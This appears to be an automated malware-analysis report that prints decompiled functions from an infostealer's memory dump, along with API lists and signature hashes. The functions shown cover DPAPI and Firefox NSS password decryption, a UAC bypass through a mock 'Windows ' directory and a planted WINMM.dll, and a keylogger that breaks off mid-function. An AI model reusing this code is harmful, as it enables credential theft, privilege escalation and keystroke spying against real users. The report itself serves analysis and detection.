				intOrPtr _v292;
				void* _v300;
				int _t11;
				void* _t22;

				_t22 = CreateToolhelp32Snapshot(2, 0);
				E00401052( &_v300, 0, 0x128);
				_v300 = 0x128;
				_t11 = Process32First(_t22,  &_v300);
				while(_t11 != 0) {
					if(E00401176( &_v264, "explorer.exe") == 0) {
						return _v292;
					}
					_t11 = Process32Next(_t22,  &_v300);
				}
				CloseHandle(_t22);
				return 0;
			}








                                  0x00414079
                                  0x00414085
                                  0x0041408d
                                  0x0041409b
                                  0x004140c8
                                  0x004140b8
                                  0x00000000
                                  0x004140d9
                                  0x004140c2
                                  0x004140c2
                                  0x004140cd
                                  0x00000000

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041406E
                                  • Process32First.KERNEL32(00000000,?), ref: 0041409B
                                  • Process32Next.KERNEL32(00000000,?), ref: 004140C2
                                  • CloseHandle.KERNEL32(00000000), ref: 004140CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID: explorer.exe
                                  • API String ID: 420147892-3187896405
                                  • Opcode ID: a7811eb097bfb4c1731681bec79869e76dd77b3fb60978c9c8995b6681227ad2
                                  • Instruction ID: ea809b74c35a4b4e8447ab93d020d769017f33877584137915eab964d6a7a943
                                  • Opcode Fuzzy Hash: a7811eb097bfb4c1731681bec79869e76dd77b3fb60978c9c8995b6681227ad2
                                  • Instruction Fuzzy Hash: CB01A972505114ABD7209761EC09FDB77FCDF49310F1040B6FA45E21C0EA78DAD58A6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409D97, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62memoryencryptionstringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 24%
                                  			E00409D97(intOrPtr __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v8216;
				char* _t24;
				signed int _t27;
				WCHAR* _t29;
				intOrPtr _t30;
				signed int* _t31;
				intOrPtr _t32;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t38;
				void* _t39;

				_t30 = __ecx;
				E004011C0(0x2014, __ecx);
				_t36 = _a4;
				_t29 = __edx;
				_v8 = _t30;
				_t3 = _t36 - 1; // -1
				_t34 = GlobalAlloc(0x40, _t3);
				_t38 = 1;
				if(_t36 > 1) {
					_t32 = _v8;
					do {
						 *((char*)(_t34 + _t38 - 1)) =  *((intOrPtr*)(_t38 + _t32));
						_t38 = _t38 + 1;
					} while (_t38 < _t36);
				}
				_t8 = _t36 - 1; // -1
				_v12 = _t34;
				_v16 = _t8;
				_t39 = 0;
				_t24 =  &_v16;
				__imp__CryptUnprotectData(_t24, 0, 0, 0, 0, 0,  &_v24);
				if(_t24 == 0) {
					_push(L"Could not decrypt");
				} else {
					if(_t36 > 0) {
						_t35 = _v20;
						_t31 =  &_v8216;
						do {
							_t27 =  *(_t35 + _t39) & 0x000000ff;
							_t39 = _t39 + 2;
							 *_t31 = _t27;
							_t31 =  &(_t31[0]);
						} while (_t39 < _t36);
					}
					_push( &_v8216);
				}
				return lstrcpyW(_t29, ??);
			}




















                                  0x00409d97
                                  0x00409d9f
                                  0x00409da7
                                  0x00409daa
                                  0x00409dac
                                  0x00409daf
                                  0x00409dbd
                                  0x00409dbf
                                  0x00409dc2
                                  0x00409dc4
                                  0x00409dc7
                                  0x00409dca
                                  0x00409dce
                                  0x00409dcf
                                  0x00409dc7
                                  0x00409dd3
                                  0x00409dd6
                                  0x00409dd9
                                  0x00409ddc
                                  0x00409de7
                                  0x00409deb
                                  0x00409df3
                                  0x00409e1c
                                  0x00409df5
                                  0x00409df7
                                  0x00409df9
                                  0x00409dfc
                                  0x00409e02
                                  0x00409e02
                                  0x00409e06
                                  0x00409e09
                                  0x00409e0c
                                  0x00409e0f
                                  0x00409e02
                                  0x00409e19
                                  0x00409e19
                                  0x00409e2c

                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,-00000001,74A345FD,?,?,?,00409D4B,00001000,?,00000000,00001000), ref: 00409DB5
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409D4B), ref: 00409DEB
                                  • lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00409E22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocCryptDataGlobalUnprotectlstrcpy
                                  • String ID: Could not decrypt
                                  • API String ID: 3112367126-1484008118
                                  • Opcode ID: a053b4f1fbd8e89e50c43ed9a83f9f24782582740e94a77ed331465ef246dd5e
                                  • Instruction ID: aa4716c66a3a11094124d3c9fea6a44173f7715366435e59aa3e46d54874a9c7
                                  • Opcode Fuzzy Hash: a053b4f1fbd8e89e50c43ed9a83f9f24782582740e94a77ed331465ef246dd5e
                                  • Instruction Fuzzy Hash: 6E11C676904219ABC711CB99C8809EFF7BCEF88704B1045BBE955F7292E6359E01CBE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C3B9, Relevance: 6.0, APIs: 4, Instructions: 49encryptionmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E0040C3B9(intOrPtr __ecx, void** __edx, long* _a4) {
				intOrPtr _v8;
				void* _t6;
				void* _t8;
				long* _t9;
				void* _t13;
				void** _t14;
				void* _t16;
				void* _t17;

				_t9 = _a4;
				_t17 = 0;
				_v8 = __ecx;
				_t14 = __edx;
				 *_t9 = 0;
				 *((intOrPtr*)(__edx)) = 0;
				__imp__CryptStringToBinaryW(__ecx, 0, 1, 0, _t9, 0, 0, _t13, _t16, _t8, __ecx);
				if(__ecx != 0) {
					_t6 = LocalAlloc(0x40,  *_t9);
					 *_t14 = _t6;
					if(_t6 != 0) {
						__imp__CryptStringToBinaryW(_v8, 0, 1, _t6, _t9, 0, 0);
						_t17 = _t6;
						if(_t17 == 0) {
							 *_t14 = LocalFree( *_t14);
						}
					}
				}
				return _t17;
			}











                                  0x0040c3be
                                  0x0040c3c5
                                  0x0040c3c7
                                  0x0040c3d0
                                  0x0040c3d2
                                  0x0040c3d6
                                  0x0040c3d8
                                  0x0040c3e0
                                  0x0040c3e6
                                  0x0040c3ec
                                  0x0040c3f0
                                  0x0040c3fc
                                  0x0040c402
                                  0x0040c406
                                  0x0040c410
                                  0x0040c410
                                  0x0040c406
                                  0x0040c3f0
                                  0x0040c418

                                  APIs
                                  • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                  • LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                  • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                  • LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: de5d65555f31f5c98b5c1a3d0e77876cadd448468ad4c2dd5e4a6cd100e7a101
                                  • Instruction ID: 97c3cc2928edf4510a7e7d2c17aa5025b134dfc6b4fce315ddd3b78eefc3bfdb
                                  • Opcode Fuzzy Hash: de5d65555f31f5c98b5c1a3d0e77876cadd448468ad4c2dd5e4a6cd100e7a101
                                  • Instruction Fuzzy Hash: A6011D71641231BFD7214B569C49EA7BFACEF497E0B108131F948E6290D7B18D00DAA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EDA9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52nativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040EDA9(intOrPtr* __ecx, char __edx) {
				char _v12;
				long _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v52;
				void _v56;
				void* _t14;
				intOrPtr _t17;
				union _PROCESSINFOCLASS _t20;
				intOrPtr* _t29;
				intOrPtr _t31;

				_t29 = __ecx;
				_v12 = __edx;
				_t20 = 0;
				_t31 = 1;
				if( *__ecx != 1) {
					_t14 = GetCurrentProcess();
					_t31 =  *_t29;
				} else {
					_t14 =  *( *(__ecx + 4));
				}
				_v32 = _v12;
				_v28 = 0x426970;
				_v20 = _t29;
				if(_t31 == 1 && NtQueryInformationProcess(_t14, _t20,  &_v56, 0x18,  &_v16) >= 0 && _v16 == 0x18) {
					_t17 = _v52;
					if(_t17 != 0) {
						_t11 =  &_v24; // 0x40ec60
						_v24 = _t17;
						_t20 = E0040EE24( &_v32, _t11, 0x150);
					}
				}
				return _t20;
			}
















                                  0x0040edb2
                                  0x0040edb4
                                  0x0040edb9
                                  0x0040edbb
                                  0x0040edbe
                                  0x0040edc7
                                  0x0040edcd
                                  0x0040edc0
                                  0x0040edc3
                                  0x0040edc3
                                  0x0040edd2
                                  0x0040edd5
                                  0x0040eddc
                                  0x0040ede2
                                  0x0040ee00
                                  0x0040ee05
                                  0x0040ee0c
                                  0x0040ee0f
                                  0x0040ee1b
                                  0x0040ee1b
                                  0x0040ee05
                                  0x0040ee23

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000001,C0000135,0040EAD8,?,?,?,?,?,?,?,?,?,0040EC60,?,00000000,?), ref: 0040EDC7
                                  • NtQueryInformationProcess.NTDLL ref: 0040EDF0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentInformationQuery
                                  • String ID: `@
                                  • API String ID: 3953534283-951712118
                                  • Opcode ID: 3907fd75677dc873825907a835a0b947a967a032764e8d362cafd5afed52a1bb
                                  • Instruction ID: 3ac64283fd91789c4a21a164da3f73717bcde32abe73c1a33020f5e4c519176d
                                  • Opcode Fuzzy Hash: 3907fd75677dc873825907a835a0b947a967a032764e8d362cafd5afed52a1bb
                                  • Instruction Fuzzy Hash: C0016171E00219AFDB04CF96D8848AFB7B9EB44351B10447AE511B7280D7745E54CFE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412F55, Relevance: 59.7, APIs: 23, Strings: 11, Instructions: 151fileregistrystringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 18%
                                  			E00412F55(void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				struct _SHELLEXECUTEINFOW _v76;
				short _v2124;
				short _v4172;
				char _v6220;
				void* _t63;
				void* _t69;
				void* _t72;
				void* _t80;
				void* _t81;

				E004011C0(0x1848, _t72);
				if(E0041111B() != 1) {
					CloseHandle( *0x559cb0);
					E00401052( &_v76, 0, 0x3c);
					_v8 = 0;
					__imp__Wow64DisableWow64FsRedirection( &_v8);
					E00401052( &_v6220, 0, 0x800);
					GetModuleFileNameW(0,  &_v6220, 0x800);
					E00401052( &_v2124, 0, 0x800);
					GetSystemDirectoryW( &_v2124, 0x800);
					lstrcatW( &_v2124, L"\\winSAT.exe");
					E00401052( &_v4172, 0, 0x800);
					GetSystemDirectoryW( &_v4172, 0x800);
					lstrcatW( &_v4172, L"\\winmm.dll");
					CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0);
					CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", 0);
					CopyFileW( &_v2124, L"\\\\?\\C:\\Windows \\System32\\winSAT.exe", 0);
					CopyFileW( &_v4172, L"\\\\?\\C:\\Windows \\System32\\winmmd.dll", 0);
					_t80 = E00412F0D(_t72);
					RegSetValueExW(_t80, L"Virtual Machine Platform", 0, 1,  &_v6220, 0x1000);
					RegCloseKey(_t80);
					__imp__IsWow64Process(GetCurrentProcess(),  &_v12);
					_push(0);
					_push(0);
					_push(2);
					_push(0);
					_push(0);
					_push(0x40000000);
					_push(L"\\\\?\\C:\\Windows \\System32\\WINMM.dll");
					if(_v12 != 0) {
						_t63 = CreateFileW();
						_push(0);
						_t81 = _t63;
						_push( &_v16);
						_push(0x3000);
						_push(0x420408);
					} else {
						_t69 = CreateFileW();
						_push(0);
						_t81 = _t69;
						_push( &_v16);
						_push(0x2e00);
						_push(0x423408);
					}
					WriteFile(_t81, ??, ??, ??, ??);
					CloseHandle(_t81);
					_v76.cbSize = 0x3c;
					_v76.lpFile = L"C:\\Windows \\System32\\winSAT.exe";
					_v76.lpParameters = L"formal";
					_v76.nShow = 0;
					_v76.hwnd = 0;
					_v76.lpDirectory = 0;
					ShellExecuteExW( &_v76);
					__imp__Wow64RevertWow64FsRedirection(_v8);
					Sleep(0x7d0);
					ExitProcess(0);
				}
				return 0;
			}















                                  0x00412f5d
                                  0x00412f6d
                                  0x00412f7f
                                  0x00412f8a
                                  0x00412f92
                                  0x00412f99
                                  0x00412fad
                                  0x00412fbe
                                  0x00412fcd
                                  0x00412fe3
                                  0x00412ff7
                                  0x00413007
                                  0x0041301b
                                  0x00413029
                                  0x00413039
                                  0x00413041
                                  0x00413056
                                  0x00413065
                                  0x0041306c
                                  0x00413083
                                  0x0041308a
                                  0x0041309b
                                  0x004130a1
                                  0x004130a2
                                  0x004130a3
                                  0x004130a5
                                  0x004130a6
                                  0x004130a7
                                  0x004130ac
                                  0x004130b4
                                  0x004130cf
                                  0x004130d5
                                  0x004130d6
                                  0x004130db
                                  0x004130dc
                                  0x004130e1
                                  0x004130b6
                                  0x004130b6
                                  0x004130bc
                                  0x004130bd
                                  0x004130c2
                                  0x004130c3
                                  0x004130c8
                                  0x004130c8
                                  0x004130e7
                                  0x004130ee
                                  0x004130f3
                                  0x004130fb
                                  0x00413102
                                  0x00413109
                                  0x0041310c
                                  0x0041310f
                                  0x00413112
                                  0x0041311b
                                  0x00413126
                                  0x0041312d
                                  0x0041312d
                                  0x00413139

                                  APIs
                                    • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                    • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                    • Part of subcall function 0041111B: GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                    • Part of subcall function 0041111B: CloseHandle.KERNEL32(00000000), ref: 00411167
                                  • CloseHandle.KERNEL32(?), ref: 00412F7F
                                  • Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,00000000,?,?,?,00405909,?,00000000,00000000,?,?,?,?,?,?), ref: 00412F99
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,?,?,?,?,?,00405909,?,00000000,00000000), ref: 00412FBE
                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00412FE3
                                  • lstrcatW.KERNEL32 ref: 00412FF7
                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0041301B
                                  • lstrcatW.KERNEL32 ref: 00413029
                                  • CreateDirectoryW.KERNEL32(\\?\C:\Windows \,00000000), ref: 00413039
                                  • CreateDirectoryW.KERNEL32(\\?\C:\Windows \System32,00000000), ref: 00413041
                                  • CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winSAT.exe,00000000), ref: 00413056
                                  • CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winmmd.dll,00000000), ref: 00413065
                                    • Part of subcall function 00412F0D: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,000F003F,l0A,00000000,767182ED,766F13E0,?,?,0041306C), ref: 00412F2C
                                    • Part of subcall function 00412F0D: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,00000000,00000000,000F003F,00000000,l0A,00000000,?,?,0041306C), ref: 00412F47
                                  • RegSetValueExW.ADVAPI32(00000000,Virtual Machine Platform,00000000,00000001,?,00001000), ref: 00413083
                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041308A
                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 00413094
                                  • IsWow64Process.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041309B
                                  • CreateFileW.KERNEL32(\\?\C:\Windows \System32\WINMM.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004130B6
                                  • CreateFileW.KERNEL32(\\?\C:\Windows \System32\WINMM.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004130CF
                                  • WriteFile.KERNEL32(00000000,00420408,00003000,?,00000000), ref: 004130E7
                                  • CloseHandle.KERNEL32(00000000), ref: 004130EE
                                  • ShellExecuteExW.SHELL32(?), ref: 00413112
                                  • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 0041311B
                                  • Sleep.KERNEL32(000007D0), ref: 00413126
                                  • ExitProcess.KERNEL32 ref: 0041312D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateProcessWow64$CloseDirectory$Handle$CopyCurrentOpenRedirectionSystemTokenlstrcat$DisableExecuteExitInformationModuleNameRevertShellSleepValueWrite
                                  • String ID: <$C:\Windows \System32\winSAT.exe$Virtual Machine Platform$\\?\C:\Windows \$\\?\C:\Windows \System32$\\?\C:\Windows \System32\WINMM.dll$\\?\C:\Windows \System32\winSAT.exe$\\?\C:\Windows \System32\winmmd.dll$\winSAT.exe$\winmm.dll$formal
                                  • API String ID: 371289168-2038174052
                                  • Opcode ID: 030c532d15d01d55ddb18d83e7d6d465989f293f85a1660a9534233c15bfab61
                                  • Instruction ID: 38432614936820ae09a91b85de116fe05e5ca363bce1e2b84a591d1acda27bec
                                  • Opcode Fuzzy Hash: 030c532d15d01d55ddb18d83e7d6d465989f293f85a1660a9534233c15bfab61
                                  • Instruction Fuzzy Hash: E9413371940258BBDB219BE1DC49ECF7FBCEF45710F104066F605E2190DB785A85CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ADE3, Relevance: 47.5, APIs: 10, Strings: 17, Instructions: 219libraryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E0040ADE3(void* __ecx, void* __edx, WCHAR* _a4) {
				WCHAR* _v8;
				long _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				char _v24;
				char _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				short _v560;
				struct HINSTANCE__* _t135;
				WCHAR* _t158;
				intOrPtr _t194;
				void* _t206;
				void* _t216;
				void* _t218;

				_t206 = __edx;
				_t158 = 0;
				_t216 = __ecx;
				E00401052( &_v560, 0, 0x104);
				GetCurrentDirectoryW(0x104,  &_v560);
				SetCurrentDirectoryW(_a4);
				E0040357C( &_a4, _t206, 0, "\\");
				E0040373F( &_v40,  &_a4);
				E0040357C( &_v40, _t206, 0, L"nss3.dll");
				E0040373F( &_v20,  &_a4);
				E0040357C( &_v20, _t206, 0, L"msvcr120.dll");
				E0040373F( &_v16,  &_a4);
				E0040357C( &_v16, _t206, 0, L"msvcp120.dll");
				E0040373F( &_v36,  &_a4);
				E0040357C( &_v36, _t206, 0, L"mozglue.dll");
				E0040373F( &_v32,  &_a4);
				E0040357C( &_v32, _t206, 0, L"softokn3.dll");
				E0040373F( &_v28,  &_a4);
				E0040357C( &_v28, _t206, 0, L"msvcp");
				E0040373F( &_v24,  &_a4);
				E0040357C( &_v24, _t206, 0, L"msvcr");
				_t218 = 0x5a;
				_v12 = 0x104;
				while(1) {
					E0040373F( &_v8,  &_v28);
					E0040357C(E00403384( &_v8, _t206, 0, _v12), _t206, 0, L".dll");
					if(PathFileExistsW(_v8) != 0) {
						break;
					}
					_v12 = _v12 + 0xa;
					E00405FEB(_v8);
					_t224 = _v12 - 0x96;
					_v8 = _t158;
					if(_v12 != 0x96) {
						continue;
					} else {
						while(1) {
							L5:
							E0040373F( &_v8,  &_v24);
							E0040357C(E00403384( &_v8, _t206, _t224, _t218), _t206, _t224, L".dll");
							if(PathFileExistsW(_v8) != 0) {
								break;
							}
							_t218 = _t218 + 0xa;
							E00405FEB(_v8);
							_v8 = _t158;
							if(_t218 != 0x96) {
								continue;
							}
							L9:
							 *((intOrPtr*)(_t216 + 0xa8)) = LoadLibraryW(_v20);
							 *((intOrPtr*)(_t216 + 0xac)) = LoadLibraryW(_v16);
							 *((intOrPtr*)(_t216 + 0xb0)) = LoadLibraryW(_v36);
							 *((intOrPtr*)(_t216 + 0xb4)) = LoadLibraryW(_v40);
							_t135 = LoadLibraryW(_v32);
							 *(_t216 + 0xb8) = _t135;
							if( *((intOrPtr*)(_t216 + 0xac)) != _t158 &&  *((intOrPtr*)(_t216 + 0xb0)) != _t158) {
								_t194 =  *((intOrPtr*)(_t216 + 0xb4));
								if(_t194 != 0) {
									_t230 = _t135;
									if(_t135 != 0) {
										_push(_t194);
										 *((intOrPtr*)(_t216 + 0x68)) = E00411E88(_t194, "NSS_Init", _t230);
										 *((intOrPtr*)(_t216 + 0x80)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_GetInternalKeySlot", _t230);
										 *((intOrPtr*)(_t216 + 0x7c)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_Authenticate", _t230);
										 *((intOrPtr*)(_t216 + 0x70)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11SDR_Decrypt", _t230);
										 *((intOrPtr*)(_t216 + 0x74)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "NSSBase64_DecodeBuffer", _t230);
										 *((intOrPtr*)(_t216 + 0x78)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_CheckUserPassword", _t230);
										 *((intOrPtr*)(_t216 + 0x6c)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "NSS_Shutdown", _t230);
										 *((intOrPtr*)(_t216 + 0x84)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_FreeSlot", _t230);
										 *((intOrPtr*)(_t216 + 0x88)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PR_GetError", _t230);
										SetCurrentDirectoryW( &_v560);
										_t158 = 1;
									}
								}
							}
							E00405FEB(_v24);
							E00405FEB(_v28);
							E00405FEB(_v32);
							E00405FEB(_v36);
							E00405FEB(_v16);
							E00405FEB(_v20);
							E00405FEB(_v40);
							E00405FEB(_a4);
							return _t158;
						}
						E00403549( &_v20,  &_v8);
						E00405FEB(_v8);
						goto L9;
					}
				}
				E00403549( &_v16,  &_v8);
				E00405FEB(_v8);
				goto L5;
			}



















                                  0x0040ade3
                                  0x0040adfb
                                  0x0040adfd
                                  0x0040ae01
                                  0x0040ae11
                                  0x0040ae1a
                                  0x0040ae28
                                  0x0040ae34
                                  0x0040ae41
                                  0x0040ae4d
                                  0x0040ae5a
                                  0x0040ae66
                                  0x0040ae73
                                  0x0040ae7f
                                  0x0040ae8c
                                  0x0040ae98
                                  0x0040aea5
                                  0x0040aeb1
                                  0x0040aebe
                                  0x0040aeca
                                  0x0040aed7
                                  0x0040aede
                                  0x0040aedf
                                  0x0040aee2
                                  0x0040aee9
                                  0x0040af00
                                  0x0040af10
                                  0x00000000
                                  0x00000000
                                  0x0040af15
                                  0x0040af19
                                  0x0040af1e
                                  0x0040af25
                                  0x0040af28
                                  0x00000000
                                  0x0040af2a
                                  0x0040af40
                                  0x0040af40
                                  0x0040af47
                                  0x0040af5c
                                  0x0040af6c
                                  0x00000000
                                  0x00000000
                                  0x0040af71
                                  0x0040af74
                                  0x0040af79
                                  0x0040af82
                                  0x00000000
                                  0x00000000
                                  0x0040af9a
                                  0x0040afa8
                                  0x0040afb3
                                  0x0040afbe
                                  0x0040afc9
                                  0x0040afcf
                                  0x0040afd1
                                  0x0040afdd
                                  0x0040afef
                                  0x0040aff7
                                  0x0040affd
                                  0x0040afff
                                  0x0040b005
                                  0x0040b01b
                                  0x0040b02e
                                  0x0040b044
                                  0x0040b057
                                  0x0040b06a
                                  0x0040b07d
                                  0x0040b090
                                  0x0040b0a3
                                  0x0040b0ae
                                  0x0040b0bc
                                  0x0040b0c4
                                  0x0040b0c4
                                  0x0040afff
                                  0x0040aff7
                                  0x0040b0c8
                                  0x0040b0d0
                                  0x0040b0d8
                                  0x0040b0e0
                                  0x0040b0e8
                                  0x0040b0f0
                                  0x0040b0f8
                                  0x0040b100
                                  0x0040b10b
                                  0x0040b10b
                                  0x0040af8d
                                  0x0040af95
                                  0x00000000
                                  0x0040af95
                                  0x0040af28
                                  0x0040af33
                                  0x0040af3b
                                  0x00000000

                                  APIs
                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040AE11
                                  • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040AE1A
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 00403384: wsprintfW.USER32 ref: 0040339F
                                  • PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF08
                                  • PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF64
                                  • LoadLibraryW.KERNEL32(?,00409EC5,?,00000104,00000000), ref: 0040AFA3
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFAE
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFB9
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFC4
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFCF
                                  • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B0BC
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
                                  • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                  • API String ID: 410702425-850564384
                                  • Opcode ID: cc16af515c41c402457062f36a950968025c5ea39f63b00c017cce32ba82f595
                                  • Instruction ID: adf04343739510be93e0c3051fa592f7aed2d6a863cdebd9eec2d50d860fb44a
                                  • Opcode Fuzzy Hash: cc16af515c41c402457062f36a950968025c5ea39f63b00c017cce32ba82f595
                                  • Instruction Fuzzy Hash: F3910C71A00609ABCB04EFA1DC92AEEBB79AF54304F10413FE515771E1DF38AA55CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040813A, Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 286keyboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040813A(signed int __ecx, int __edx, long _a4) {
				signed int _v8;
				int _v12;
				short _v24;
				short _v56;
				void* _t21;
				short _t24;
				short _t27;
				void* _t36;
				int _t46;
				signed int _t48;
				WCHAR* _t49;
				WCHAR* _t50;
				long _t57;
				void* _t58;
				short _t59;
				short _t60;
				short _t62;
				short _t63;
				short _t64;
				short _t66;
				short _t67;
				short _t69;
				short _t70;
				short _t71;
				short _t73;
				short _t75;
				short _t77;
				short _t78;
				short _t79;
				signed int _t81;

				_t55 = __edx;
				_t48 = __ecx;
				_t46 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t57 = _a4;
				_t21 = __edx - 0x100;
				if(_t21 == 0 || _t21 == 4) {
					_t58 =  *_t57;
					if(_t58 < 0x27) {
						__eflags = _t58 - 0x40;
						if(_t58 <= 0x40) {
							L21:
							__eflags = _t58 - 0x66;
							if(__eflags > 0) {
								__eflags = _t58 - 0xbc;
								if(__eflags > 0) {
									__eflags = _t58 - 0xdb;
									if(__eflags > 0) {
										_t59 = _t58 - 0xdc;
										__eflags = _t59;
										if(_t59 == 0) {
											_t24 = GetAsyncKeyState(0x10);
											_t49 = "|";
											__eflags = _t24;
											if(__eflags == 0) {
												_t49 = "\\";
											}
											L99:
											E004085CB(_t49, _t55, _t90);
											goto L100;
										}
										_t60 = _t59 - 1;
										__eflags = _t60;
										if(_t60 == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "}";
											_t55 = "]";
											L76:
											__eflags = _t27;
											_t49 =  ==  ? _t55 : _t50;
											goto L99;
										}
										__eflags = _t60 - 1;
										if(__eflags == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "\"";
											_t55 = "\'";
											goto L76;
										}
										L94:
										GetKeyNameTextW((( *(_t57 + 8) << 8) +  *((intOrPtr*)(_t57 + 4)) << 0x10) + 1,  &_v56, 0xf);
